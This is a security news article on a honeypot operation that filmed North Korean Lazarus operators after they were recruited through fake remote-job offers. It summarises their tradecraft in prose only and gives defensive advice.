ANYRUN and NorthScan have exposed the inner workings of North Korea’s Lazarus Group through a bold honeypot operation.
Researchers captured live video of attackers using fake corporate laptops, revealing their full recruitment and attack pipeline.
This marks the first time Lazarus operators linked to the notorious Chollima subgroup were recorded mid-operation against Western targets.
The operation highlights how Lazarus blends social engineering with technical stealth, turning job offers into network breaches.
It started with a LinkedIn message from “Aaron,” alias “Blaze,” a known Lazarus recruiter.
He offered remote workers 35% of a full salary for “laptop access” to perform tasks code for installing malware and exfiltrating data from real companies.
Instead of declining, researchers from Mauro Eldritch at BCA LTD supplied ANYRUN sandbox environments.
These virtual machines mimicked Windows and macOS workstations with realistic peripherals, network interfaces, and idle processes to evade detection.
Tools like ANYRUN’s behavioral analysis logged every keystroke, screenshot, and process spawn without alerting the attackers.
Over the course of months, “hired” operators logged in via RDP and VPN tunnels.
They ran custom PowerShell scripts for persistence, including obfuscated loaders that injected shellcode into legitimate processes such as explorer.exe.
Videos showed them scanning for endpoints with nmap equivalents and deploying Cobalt Strike beacons disguised as PDF readers.
The honeypot unveiled the complete Chollima attack cycle: reconnaissance, initial access via recruited insiders, lateral movement, and C2 staging.
Attackers used living-off-the-land binaries (LOLBins), such as certutil.exe for downloads and bitsadmin for staging payloads.
They targeted npm packages for supply chain footholds, echoing past attacks.
OPSEC was advanced: operators rotated user agents, chained proxies through bulletproof hosting in Russia and China, and checked for sandbox artifacts like low RAM or missing hardware sensors.
Despite this, the honeypots held, capturing malware samples with AES-encrypted configs pointing to Firebase C2 servers.
This shifts Lazarus from zero-days to insider recruitment, bypassing firewalls via trusted VPN logins.
Defenders must vet job applicants in tech roles, scan for anomalous RDP from high-risk IPs, and deploy endpoint detection for LOLBins.
Led by @0xfigo at NorthScan, the findings will be released with IOCs soon. Enterprises face a new reality: threats hide in HR inboxes.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…